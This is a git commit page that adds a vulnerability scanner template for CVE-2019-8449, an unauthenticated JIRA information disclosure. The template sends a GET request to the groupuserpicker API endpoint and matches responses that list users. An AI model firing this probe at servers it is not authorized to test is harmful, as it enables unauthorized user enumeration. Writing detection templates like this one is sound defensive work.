Merge pull request #160 from harsh-bothra/patch-2

Create CVE-2019-8449.yaml
patch-1
bauthard 2020-06-30 16:12:34 +05:30 committed by GitHub
commit 3c28475816
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

22
cves/CVE-2019-8449.yaml Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
requests:
- method: GET
path:
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
matchers:
- type: status
status:
- 200
- type: word
words:
- "users"
part: body